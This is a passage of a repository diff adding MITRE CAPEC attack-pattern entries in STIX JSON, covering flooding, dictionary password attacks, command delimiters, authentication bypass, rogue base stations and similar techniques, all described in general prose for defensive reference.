"description": "Walid Negm, Anatomy of a Web Services Attack, 2004--03---01, ForumSystems",
"url": "https://www.forumsys.com/wp-content/uploads/2014/01/Anatomy-of-a-Web-Services-Attack.pdf",
"external_id": "REF-554"
},
{
"source_name": "reference_from_CAPEC",
"description": "Frank Coyle, Seven Steps to XML Mastery, 2006--08---25",
"url": "http://www.informit.com/articles/article.aspx?p=601349",
"external_id": "REF-555"
}
],
"object_marking_refs": [
"marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89"
],
"x_capec_abstraction": "Detailed",
"x_capec_consequences": {
"Confidentiality": [
"Read Data"
]
},
"x_capec_example_instances": [
"A WSDL interface may expose a function vulnerable to SQL Injection.",
"\n <xhtml:p>The Web Services Description Language (WSDL) allows a web service to advertise its capabilities by describing operations and parameters needed to access the service. As discussed in step 5 of this series, WSDL is often generated automatically, using utilities such as Java2WSDL, which takes a class or interface and builds a WSDL file in which interface methods are exposed as web services.</xhtml:p>\n <xhtml:p>Because WSDL generation often is automated, enterprising adversaries can use WSDL to gain insight into the both public and private services. For example, an organization converting legacy application functionality to a web services framework may inadvertently pass interfaces not intended for public consumption to a WSDL generation tool. The result will be SOAP interfaces that give access to private methods.</xhtml:p>\n <xhtml:p>Another, more subtle WSDL attack occurs when an enterprising attacker uses naming conventions to guess the names of unpublished methods that may be available on the server. For example, a service that offers a stock quote and trading service may publish query methods such as requestStockQuote in its WSDL. However, similar unpublished methods may be available on the server but not listed in the WSDL, such as executeStockQuote. A persistent adversary with time and a library of words and phrases can cycle thru common naming conventions (get, set, update, modify, and so on) to discover unpublished application programming interfaces that open doors into private data and functionality.</xhtml:p>\n <xhtml:p>Source : \"Seven Steps to XML Mastery, Step 7: Ensure XML Security\", Frank Coyle. See reference section.</xhtml:p>\n "
],
"x_capec_likelihood_of_attack": "High",
"x_capec_prerequisites": [
"A client program connecting to a web service can read the WSDL to determine what functions are available on the server.",
"The target host exposes vulnerable functions within its WSDL interface."
],
"x_capec_skills_required": {
"Low": "This attack can be as simple as reading WSDL and starting sending invalid request.",
"Medium": "This attack can be used to perform more sophisticated attacks (SQL injection, etc.)"
},
"x_capec_status": "Draft",
"x_capec_typical_severity": "High",
"x_capec_version": "3.2"
}
]
}
capec/attack-pattern/attack-pattern--0829aa8e-55a4-46cb-be87-43dbc49d6a5e.json
+53
View File
@@ -0,0 +1,53 @@
{
"type": "bundle",
"id": "bundle--a60fff86-1196-46f0-b237-5e3af093321f",
"spec_version": "2.0",
"objects": [
{
"type": "attack-pattern",
"id": "attack-pattern--0829aa8e-55a4-46cb-be87-43dbc49d6a5e",
"created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322",
"created": "2014-06-23T00:00:00.000Z",
"modified": "2017-05-01T00:00:00.000Z",
"name": "Flooding",
"description": "An adversary consumes the resources of a target by rapidly engaging in a large number of interactions with the target. This type of attack generally exposes a weakness in rate limiting or flow. When successful this attack prevents legitimate users from accessing the service and can cause the target to crash. This attack differs from resource depletion through leaks or allocations in that the latter attacks do not rely on the volume of requests made to the target but instead focus on manipulation of the target's operations. The key factor in a flooding attack is the number of requests the adversary can make in a given period of time. The greater this number, the more likely an attack is to succeed against a given target.",
"external_references": [
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/125.html",
"external_id": "CAPEC-125"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/404.html",
"external_id": "CWE-404"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/770.html",
"external_id": "CWE-770"
}
],
"object_marking_refs": [
"marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89"
],
"x_capec_abstraction": "Meta",
"x_capec_consequences": {
"Availability": [
"Unreliable Execution (A successful flooding attack compromises the availability of the target system's service by exhausting its available resources.)",
"Resource Consumption (A successful flooding attack compromises the availability of the target system's service by exhausting its available resources.)"
]
},
"x_capec_likelihood_of_attack": "High",
"x_capec_prerequisites": [
"Any target that services requests is vulnerable to this attack on some level of scale."
],
"x_capec_resources_required": [
"A script or program capable of generating more requests than the target can handle, or a network or cluster of objects all capable of making simultaneous requests."
],
"x_capec_status": "Stable",
"x_capec_typical_severity": "Medium",
"x_capec_version": "3.2"
}
]
}
capec/attack-pattern/attack-pattern--08fc69ee-ec0f-466e-b81f-3e4ad15f957b.json
+41
View File
@@ -0,0 +1,41 @@
{
"type": "bundle",
"id": "bundle--10c7d6e1-2153-4880-8ed2-740832bab0ba",
"spec_version": "2.0",
"objects": [
{
"type": "attack-pattern",
"id": "attack-pattern--08fc69ee-ec0f-466e-b81f-3e4ad15f957b",
"created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322",
"created": "2014-06-23T00:00:00.000Z",
"modified": "2019-04-04T00:00:00.000Z",
"name": "Fuzzing for garnering other adjacent user/sensitive data",
"description": "An attacker who is authorized to send queries to a target sends variants of expected queries in the hope that these modified queries might return information (directly or indirectly through error logs) beyond what the expected set of queries should provide. Many client applications use specific query templates when interacting with a server and often automatically fill in specific fields or attributes. For example, a client that queries an employee database might have templates such that the user only supplies the target's name and the template dictates the fields to be returned (location, position in the company, phone number, etc.). If the server does not verify that the query matches one of the expected templates, an attacker who is allowed to send normal queries could modify their query to try to return additional information. In the above example, additional information might include social security numbers or salaries. Fuzzing techniques involve sending random or malformed messages to a target and monitoring the target's response. In this particular attack, the fuzzing is applied to the format of the expected templates, creating variants that request additional information, exclude limiting clauses, or alter fields that identify the requester in order to subvert access controls. The attacker may not know the names of fields to request or how other modifications will affect the server response, but by attempting multiple plausible variants, they might eventually trigger a server response that divulges sensitive information. Other possible outcomes include server crashes and resource consumption if the unexpected queries cause the server to enter an unstable state or perform excessive computation.",
"external_references": [
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/261.html",
"external_id": "CAPEC-261"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/20.html",
"external_id": "CWE-20"
}
],
"object_marking_refs": [
"marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89"
],
"x_capec_abstraction": "Detailed",
"x_capec_prerequisites": [
"The server must assume that the queries it receives follow specific templates and/or have fields or attributes that follow specific procedures. The server must process queries that it receives without adequately checking or sanitizing queries to ensure they follow these templates."
],
"x_capec_resources_required": [
"The attacker must have sufficient privileges to send queries to the targeted server. A normal client might limit the nature of these queries, so the attacker must either have a modified client or their own application which allows them to modify the expected queries."
],
"x_capec_status": "Draft",
"x_capec_typical_severity": "Medium",
"x_capec_version": "3.2"
}
]
}
capec/attack-pattern/attack-pattern--0a4d7993-b6a5-4102-8789-1e20cf34f3a9.json
+77
View File
@@ -0,0 +1,77 @@
{
"type": "bundle",
"id": "bundle--8004ee5f-6064-4ac7-b4d2-071de2286e5f",
"spec_version": "2.0",
"objects": [
{
"type": "attack-pattern",
"id": "attack-pattern--0a4d7993-b6a5-4102-8789-1e20cf34f3a9",
"created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322",
"created": "2014-06-23T00:00:00.000Z",
"modified": "2014-06-23T00:00:00.000Z",
"name": "Dictionary-based Password Attack",
"description": "An attacker tries each of the words in a dictionary as passwords to gain access to the system via some user's account. If the password chosen by the user was a word within the dictionary, this attack will be successful (in the absence of other mitigations). This is a specific instance of the password brute forcing attack pattern.",
"external_references": [
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/16.html",
"external_id": "CAPEC-16"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/521.html",
"external_id": "CWE-521"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/262.html",
"external_id": "CWE-262"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/263.html",
"external_id": "CWE-263"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/693.html",
"external_id": "CWE-693"
}
],
"object_marking_refs": [
"marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89"
],
"x_capec_abstraction": "Detailed",
"x_capec_consequences": {
"Access_Control": [
"Gain Privileges"
],
"Authorization": [
"Gain Privileges"
],
"Confidentiality": [
"Gain Privileges"
]
},
"x_capec_example_instances": [
"A system user selects the word \"treacherous\" as their passwords believing that it would be very difficult to guess. The password-based dictionary attack is used to crack this password and gain access to the account.",
"\n <xhtml:p>The Cisco LEAP challenge/response authentication mechanism uses passwords in a way that is susceptible to dictionary attacks, which makes it easier for remote attackers to gain privileges via brute force password guessing attacks.</xhtml:p>\n <xhtml:p>Cisco LEAP is a mutual authentication algorithm that supports dynamic derivation of session keys. With Cisco LEAP, mutual authentication relies on a shared secret, the user's logon password (which is known by the client and the network), and is used to respond to challenges between the user and the Remote Authentication Dial-In User Service (RADIUS) server.</xhtml:p>\n <xhtml:p>Methods exist for someone to write a tool to launch an offline dictionary attack on password-based authentications that leverage Microsoft MS-CHAP, such as Cisco LEAP. The tool leverages large password lists to efficiently launch offline dictionary attacks against LEAP user accounts, collected through passive sniffing or active techniques.</xhtml:p>See also: CVE-2003-1096"
],
"x_capec_likelihood_of_attack": "Medium",
"x_capec_prerequisites": [
"The system uses one factor password based authentication.",
"The system does not have a sound password policy that is being enforced.",
"The system does not implement an effective password throttling mechanism."
],
"x_capec_resources_required": [
"A machine with sufficient resources for the job (e.g. CPU, RAM, HD). Applicable dictionaries are required. Also a password cracking tool or a custom script that leverages the dictionary database to launch the attack."
],
"x_capec_skills_required": {
"Low": "A variety of password cracking tools and dictionaries are available to launch this type of an attack."
},
"x_capec_status": "Draft",
"x_capec_typical_severity": "High",
"x_capec_version": "3.2"
}
]
}
capec/attack-pattern/attack-pattern--0a4e2ddd-8014-4979-8ddf-42cafef2e657.json
+34
View File
@@ -0,0 +1,34 @@
{
"type": "bundle",
"id": "bundle--f0434646-db6d-4e2e-a5be-676d83de6a0e",
"spec_version": "2.0",
"objects": [
{
"type": "attack-pattern",
"id": "attack-pattern--0a4e2ddd-8014-4979-8ddf-42cafef2e657",
"created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322",
"created": "2014-06-23T00:00:00.000Z",
"modified": "2019-09-30T00:00:00.000Z",
"name": "Lock Picking",
"description": "An attacker uses lock picking tools and techniques to bypass the locks on a building or facility. Lock picking is the use of a special set of tools to manipulate the pins within a lock. Different sets of tools are required for each type of lock. Lock picking attacks have the advantage of being non-invasive in that if performed correctly the lock will not be damaged. A standard lock pin-and-tumbler lock is secured by a set of internal pins that prevent the tumbler device from turning. Spring loaded driver pins push down on the key pins preventing rotation so that the bolt remains in a locked position.. When the correct key is inserted, the ridges on the key push the key pins up and against the driver pins, causing correct alignment which allows the lock cylinder to rotate. Most common locks, such as domestic locks in the US, can be picked using a standard 2 tools (i.e. a torsion wrench and a hook pick).",
"external_references": [
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/393.html",
"external_id": "CAPEC-393"
},
{
"source_name": "reference_from_CAPEC",
"description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill",
"external_id": "REF-33"
}
],
"object_marking_refs": [
"marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89"
],
"x_capec_abstraction": "Detailed",
"x_capec_status": "Draft",
"x_capec_version": "3.2"
}
]
}
capec/attack-pattern/attack-pattern--0a4e6d07-4253-4194-a606-477cb09a9f36.json
+79
View File
@@ -0,0 +1,79 @@
{
"type": "bundle",
"id": "bundle--edaead3e-6348-4960-8ebb-8fc1af50c91d",
"spec_version": "2.0",
"objects": [
{
"type": "attack-pattern",
"id": "attack-pattern--0a4e6d07-4253-4194-a606-477cb09a9f36",
"created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322",
"created": "2014-06-23T00:00:00.000Z",
"modified": "2019-04-04T00:00:00.000Z",
"name": "Exploiting Incorrectly Configured Access Control Security Levels",
"description": "An attacker exploits a weakness in the configuration of access controls and is able to bypass the intended protection that these measures guard against and thereby obtain unauthorized access to the system or network. Sensitive functionality should always be protected with access controls. However configuring all but the most trivial access control systems can be very complicated and there are many opportunities for mistakes. If an attacker can learn of incorrectly configured access security settings, they may be able to exploit this in an attack. Most commonly, attackers would take advantage of controls that provided too little protection for sensitive activities in order to perform actions that should be denied to them. In some circumstances, an attacker may be able to take advantage of overly restrictive access control policies, initiating denial of services (if an application locks because it unexpectedly failed to be granted access) or causing other legitimate actions to fail due to security. The latter class of attacks, however, is usually less severe and easier to detect than attacks based on inadequate security restrictions. This attack pattern differs from CAPEC 1, \"Accessing Functionality Not Properly Constrained by ACLs\" in that the latter describes attacks where sensitive functionality lacks access controls, where, in this pattern, the access control is present, but incorrectly configured.",
"external_references": [
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/180.html",
"external_id": "CAPEC-180"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/732.html",
"external_id": "CWE-732"
},
{
"source_name": "reference_from_CAPEC",
"description": "Silvio Cesare, Share Library Call Redirection Via ELF PLT Infection (Issue 56), Phrack Magazine, 2000",
"url": "http://phrack.org/issues/56/7.html",
"external_id": "REF-29"
},
{
"source_name": "reference_from_CAPEC",
"description": "OWASP Top 10 (2007), The Open Web Application Security Project (OWASP)",
"url": "http://www.owasp.org/index.php/Top_10_2007-A3",
"external_id": "REF-45"
}
],
"object_marking_refs": [
"marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89"
],
"x_capec_abstraction": "Standard",
"x_capec_consequences": {
"Access_Control": [
"Bypass Protection Mechanism"
],
"Authorization": [
"Execute Unauthorized Commands (Run Arbitrary Code)",
"Gain Privileges",
"Bypass Protection Mechanism"
],
"Availability": [
"Unreliable Execution"
],
"Confidentiality": [
"Read Data"
],
"Integrity": [
"Modify Data"
]
},
"x_capec_example_instances": [
"For example, an incorrectly configured Web server, may allow unauthorized access to it, thus threaten the security of the Web application."
],
"x_capec_likelihood_of_attack": "High",
"x_capec_prerequisites": [
"The target must apply access controls, but incorrectly configure them. However, not all incorrect configurations can be exploited by an attacker. If the incorrect configuration applies too little security to some functionality, then the attacker may be able to exploit it if the access control would be the only thing preventing an attacker's access and it no longer does so. If the incorrect configuration applies too much security, it must prevent legitimate activity and the attacker must be able to force others to require this activity.."
],
"x_capec_resources_required": [
"None: No specialized resources are required to execute this type of attack."
],
"x_capec_skills_required": {
"Low": "In order to discover unrestricted resources, the attacker does not need special tools or skills. He only has to observe the resources or access mechanisms invoked as each action is performed and then try and access those access mechanisms directly."
},
"x_capec_status": "Draft",
"x_capec_typical_severity": "Medium",
"x_capec_version": "3.2"
}
]
}
capec/attack-pattern/attack-pattern--0aef1f25-ea71-4790-95d5-32b8b16e7ca7.json
+42
View File
@@ -0,0 +1,42 @@
{
"type": "bundle",
"id": "bundle--b341c0f6-ec95-4572-8518-e2c2d5d2be8a",
"spec_version": "2.0",
"objects": [
{
"type": "attack-pattern",
"id": "attack-pattern--0aef1f25-ea71-4790-95d5-32b8b16e7ca7",
"created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322",
"created": "2014-06-23T00:00:00.000Z",
"modified": "2019-04-04T00:00:00.000Z",
"name": "Bypassing ATA Password Security",
"description": "An attacker exploits a weakness in ATA security on a drive to gain access to the information the drive contains without supplying the proper credentials. ATA Security is often employed to protect hard disk information from unauthorized access. The mechanism requires the user to type in a password before the BIOS is allowed access to drive contents. Some implementations of ATA security will accept the ATA command to update the password without the user having authenticated with the BIOS. This occurs because the security mechanism assumes the user has first authenticated via the BIOS prior to sending commands to the drive. Various methods exist for exploiting this flaw, the most common being installing the ATA protected drive into a system lacking ATA security features (a.k.a. hot swapping). Once the drive is installed into the new system the BIOS can be used to reset the drive password.",
"external_references": [
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/402.html",
"external_id": "CAPEC-402"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/285.html",
"external_id": "CWE-285"
},
{
"source_name": "reference_from_CAPEC",
"description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill",
"external_id": "REF-33"
}
],
"object_marking_refs": [
"marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89"
],
"x_capec_abstraction": "Detailed",
"x_capec_prerequisites": [
"Access to the system containing the ATA Drive so that the drive can be physically removed from the system."
],
"x_capec_status": "Draft",
"x_capec_version": "3.2"
}
]
}
capec/attack-pattern/attack-pattern--0b3cd893-e335-4def-8662-9af40760517e.json
+29
View File
@@ -0,0 +1,29 @@
{
"type": "bundle",
"id": "bundle--8cf6c808-7d68-4181-8346-c4aaaf812f60",
"spec_version": "2.0",
"objects": [
{
"type": "attack-pattern",
"id": "attack-pattern--0b3cd893-e335-4def-8662-9af40760517e",
"created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322",
"created": "2014-06-23T00:00:00.000Z",
"modified": "2017-05-01T00:00:00.000Z",
"name": "DEPRECATED: Environment Variable Manipulation",
"description": "This attack pattern has been deprecated as it is a duplicate of the existing attack pattern \"CAPEC-13 : Subverting Environment Variable Values\". Please refer to this other CAPEC going forward.",
"external_references": [
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/264.html",
"external_id": "CAPEC-264"
}
],
"object_marking_refs": [
"marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89"
],
"x_capec_abstraction": "Meta",
"x_capec_status": "Deprecated",
"x_capec_version": "3.2"
}
]
}
capec/attack-pattern/attack-pattern--0cfa0b69-241b-411b-bf20-d4a3b758a672.json
+48
View File
@@ -0,0 +1,48 @@
{
"type": "bundle",
"id": "bundle--5c6aea12-d954-4c90-838f-0fbca6f2b61a",
"spec_version": "2.0",
"objects": [
{
"type": "attack-pattern",
"id": "attack-pattern--0cfa0b69-241b-411b-bf20-d4a3b758a672",
"created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322",
"created": "2014-06-23T00:00:00.000Z",
"modified": "2017-08-04T00:00:00.000Z",
"name": "Target Influence via Framing",
"description": "An adversary uses framing techniques to contextualize a conversation so that the target is more likely to be influenced by the adversary's point of view. Framing is information and experiences in life that alter the way we react to decisions we must make. This type of persuasive technique exploits the way people are conditioned to perceive data and its significance, while avoiding negative or avoidance responses from the target. Rather than a specific technique framing is a methodology of conversation that slowly encourages the target to adopt to the adversary's perspective. One technique of framing is to avoid the use of the word \"No\" and to contextualize responses in a manner that is positive. When performed skillfully the target is much more likely to volunteer information or perform actions favorable to the adversary.",
"external_references": [
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/425.html",
"external_id": "CAPEC-425"
},
{
"source_name": "reference_from_CAPEC",
"description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC",
"url": "http://www.social-engineer.org",
"external_id": "REF-348"
}
],
"object_marking_refs": [
"marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89"
],
"x_capec_abstraction": "Standard",
"x_capec_consequences": {
"Confidentiality": [
"Other (Successful attacks that influence the target via framing into performing an action or sharing sensitive information can result in a variety of consequences that negatively affect the confidentiality of an application or system.)"
]
},
"x_capec_likelihood_of_attack": "Low",
"x_capec_prerequisites": [
"The adversary must have the means and knowledge of how to communicate with the target in some manner."
],
"x_capec_skills_required": {
"Low": "The adversary requires strong inter-personal and communication skills."
},
"x_capec_status": "Draft",
"x_capec_typical_severity": "Low",
"x_capec_version": "3.2"
}
]
}
capec/attack-pattern/attack-pattern--0db28437-bbb7-4654-afda-e51ac1c18f74.json
+42
View File
@@ -0,0 +1,42 @@
{
"type": "bundle",
"id": "bundle--4b693f5d-b823-440f-8907-93c78fd2efc0",
"spec_version": "2.0",
"objects": [
{
"type": "attack-pattern",
"id": "attack-pattern--0db28437-bbb7-4654-afda-e51ac1c18f74",
"created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322",
"created": "2014-06-23T00:00:00.000Z",
"modified": "2017-08-04T00:00:00.000Z",
"name": "Resource Location Spoofing",
"description": "An adversary deceives an application or user and convinces them to request a resource from an unintended location. By spoofing the location, the adversary can cause an alternate resource to be used, often one that the adversary controls and can be used to help them achieve their malicious goals.",
"external_references": [
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/154.html",
"external_id": "CAPEC-154"
}
],
"object_marking_refs": [
"marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89"
],
"x_capec_abstraction": "Meta",
"x_capec_consequences": {
"Authorization": [
"Execute Unauthorized Commands (Run Arbitrary Code)"
]
},
"x_capec_likelihood_of_attack": "Medium",
"x_capec_prerequisites": [
"None. All applications rely on file paths and therefore, in theory, they or their resources could be affected by this type of attack."
],
"x_capec_resources_required": [
"None: No specialized resources are required to execute this type of attack."
],
"x_capec_status": "Stable",
"x_capec_typical_severity": "Medium",
"x_capec_version": "3.2"
}
]
}
capec/attack-pattern/attack-pattern--0e301650-cbba-4113-9bfd-fb9b637d40c3.json
+41
View File
@@ -0,0 +1,41 @@
{
"type": "bundle",
"id": "bundle--9286caa6-602d-4e67-88e5-f0e93721dc1b",
"spec_version": "2.0",
"objects": [
{
"type": "attack-pattern",
"id": "attack-pattern--0e301650-cbba-4113-9bfd-fb9b637d40c3",
"created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322",
"created": "2015-11-09T00:00:00.000Z",
"modified": "2019-09-30T00:00:00.000Z",
"name": "Cellular Rogue Base Station",
"description": "In this attack scenario, the attacker imitates a cellular base station with his own \"rogue\" base station equipment. Since cellular devices connect to whatever station has the strongest signal, the attacker can easily convince a targeted cellular device (e.g. the retransmission device) to talk to the rogue base station.",
"external_references": [
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/617.html",
"external_id": "CAPEC-617"
}
],
"object_marking_refs": [
"marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89"
],
"x_capec_abstraction": "Detailed",
"x_capec_consequences": {
"Confidentiality": [
"Read Data (Intercept and control cellular data communications to/from mobile device.)"
]
},
"x_capec_prerequisites": [
"None"
],
"x_capec_skills_required": {
"Low": "This technique has been demonstrated by amateur hackers and commercial tools and open source projects are available to automate the attack."
},
"x_capec_status": "Draft",
"x_capec_typical_severity": "Low",
"x_capec_version": "3.2"
}
]
}
capec/attack-pattern/attack-pattern--0e4fc913-dbca-47cc-ab7c-4e6742e13f90.json
+29
View File
@@ -0,0 +1,29 @@
{
"type": "bundle",
"id": "bundle--9da8e2d7-56d5-47f2-8937-7c055e39f326",
"spec_version": "2.0",
"objects": [
{
"type": "attack-pattern",
"id": "attack-pattern--0e4fc913-dbca-47cc-ab7c-4e6742e13f90",
"created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322",
"created": "2015-11-09T00:00:00.000Z",
"modified": "2018-07-31T00:00:00.000Z",
"name": "DEPRECATED: Signature-Based Avoidance",
"description": "This CAPEC has been deprecated because of is not directly related to a weakness, social engineering, supply chains, or a physical-based attack.",
"external_references": [
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/570.html",
"external_id": "CAPEC-570"
}
],
"object_marking_refs": [
"marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89"
],
"x_capec_abstraction": "Detailed",
"x_capec_status": "Deprecated",
"x_capec_version": "3.2"
}
]
}
capec/attack-pattern/attack-pattern--0e6d2797-eedc-4782-8e0c-eb9a682d2b54.json
+120
View File
@@ -0,0 +1,120 @@
{
"type": "bundle",
"id": "bundle--cce55634-d2be-418b-b3db-ffcad0fefe80",
"spec_version": "2.0",
"objects": [
{
"type": "attack-pattern",
"id": "attack-pattern--0e6d2797-eedc-4782-8e0c-eb9a682d2b54",
"created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322",
"created": "2014-06-23T00:00:00.000Z",
"modified": "2019-09-30T00:00:00.000Z",
"name": "Command Delimiters",
"description": "An attack of this type exploits a programs' vulnerabilities that allows an attacker's commands to be concatenated onto a legitimate command with the intent of targeting other resources such as the file system or database. The system that uses a filter or a blacklist input validation, as opposed to whitelist validation is vulnerable to an attacker who predicts delimiters (or combinations of delimiters) not present in the filter or blacklist. As with other injection attacks, the attacker uses the command delimiter payload as an entry point to tunnel through the application and activate additional attacks through SQL queries, shell commands, network scanning, and so on.",
"external_references": [
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/15.html",
"external_id": "CAPEC-15"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/146.html",
"external_id": "CWE-146"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/77.html",
"external_id": "CWE-77"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/184.html",
"external_id": "CWE-184"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/78.html",
"external_id": "CWE-78"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/185.html",
"external_id": "CWE-185"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/93.html",
"external_id": "CWE-93"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/140.html",
"external_id": "CWE-140"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/157.html",
"external_id": "CWE-157"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/138.html",
"external_id": "CWE-138"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/154.html",
"external_id": "CWE-154"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/697.html",
"external_id": "CWE-697"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/713.html",
"external_id": "CWE-713"
},
{
"source_name": "reference_from_CAPEC",
"description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley",
"external_id": "REF-1"
}
],
"object_marking_refs": [
"marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89"
],
"x_capec_abstraction": "Standard",
"x_capec_consequences": {
"Availability": [
"Execute Unauthorized Commands (Run Arbitrary Code)"
],
"Confidentiality": [
"Execute Unauthorized Commands (Run Arbitrary Code)",
"Read Data"
],
"Integrity": [
"Execute Unauthorized Commands (Run Arbitrary Code)"
]
},
"x_capec_example_instances": [
"\n <xhtml:p>By appending special characters, such as a semicolon or other commands that are executed by the target process, the attacker is able to execute a wide variety of malicious commands in the target process space, utilizing the target's inherited permissions, against any resource the host has access to. The possibilities are vast including injection attacks against RDBMS (SQL Injection), directory servers (LDAP Injection), XML documents (XPath and XQuery Injection), and command line shells. In many injection attacks, the results are converted back to strings and displayed to the client process such as a web browser without tripping any security alarms, so the network firewall does not log any out of the ordinary behavior.</xhtml:p>\n <xhtml:p>LDAP servers house critical identity assets such as user, profile, password, and group information that is used to authenticate and authorize users. An attacker that can query the directory at will and execute custom commands against the directory server is literally working with the keys to the kingdom in many enterprises. When user, organizational units, and other directory objects are queried by building the query string directly from user input with no validation, or other conversion, then the attacker has the ability to use any LDAP commands to query, filter, list, and crawl against the LDAP server directly in the same manner as SQL injection gives the ability to the attacker to run SQL commands on the database.</xhtml:p>\n "
],
"x_capec_likelihood_of_attack": "High",
"x_capec_prerequisites": [
"Software's input validation or filtering must not detect and block presence of additional malicious command."
],
"x_capec_resources_required": [
"Ability to communicate synchronously or asynchronously with server. Optionally, ability to capture output directly through synchronous communication or other method such as FTP."
],
"x_capec_skills_required": {
"Medium": "The attacker has to identify injection vector, identify the specific commands, and optionally collect the output, i.e. from an interactive session."
},
"x_capec_status": "Draft",
"x_capec_typical_severity": "High",
"x_capec_version": "3.2"
}
]
}
capec/attack-pattern/attack-pattern--0ede9fe1-83e7-46df-9005-ef287e18addb.json
+41
View File
@@ -0,0 +1,41 @@
{
"type": "bundle",
"id": "bundle--182f8568-8f5d-4431-b9ab-9e443075a05f",
"spec_version": "2.0",
"objects": [
{
"type": "attack-pattern",
"id": "attack-pattern--0ede9fe1-83e7-46df-9005-ef287e18addb",
"created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322",
"created": "2014-06-23T00:00:00.000Z",
"modified": "2017-08-04T00:00:00.000Z",
"name": "Authentication Bypass",
"description": "An attacker gains access to application, service, or device with the privileges of an authorized or privileged user by evading or circumventing an authentication mechanism. The attacker is therefore able to access protected data without authentication ever having taken place. This refers to an attacker gaining access equivalent to an authenticated user without ever going through an authentication procedure. This is usually the result of the attacker using an unexpected access procedure that does not go through the proper checkpoints where authentication should occur. For example, a web site might assume that all users will click through a given link in order to get to secure material and simply authenticate everyone that clicks the link. However, an attacker might be able to reach secured web content by explicitly entering the path to the content rather than clicking through the authentication link, thereby avoiding the check entirely. This attack pattern differs from other authentication attacks in that attacks of this pattern avoid authentication entirely, rather than faking authentication by exploiting flaws or by stealing credentials from legitimate users.",
"external_references": [
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/115.html",
"external_id": "CAPEC-115"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/287.html",
"external_id": "CWE-287"
}
],
"object_marking_refs": [
"marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89"
],
"x_capec_abstraction": "Meta",
"x_capec_prerequisites": [
"An authentication mechanism or subsystem implementing some form of authentication such as passwords, digest authentication, security certificates, etc."
],
"x_capec_resources_required": [
"A client application, such as a web browser, or a scripting language capable of interacting with the target."
],
"x_capec_status": "Draft",
"x_capec_typical_severity": "Medium",
"x_capec_version": "3.2"
}
]
}
capec/attack-pattern/attack-pattern--10500aa1-6d0e-486c-8c87-8d24e20e01a7.json
+29
View File
@@ -0,0 +1,29 @@
{
"type": "bundle",
"id": "bundle--15e92323-24a0-4053-81a7-6b31db81079c",
"spec_version": "2.0",
"objects": [
{
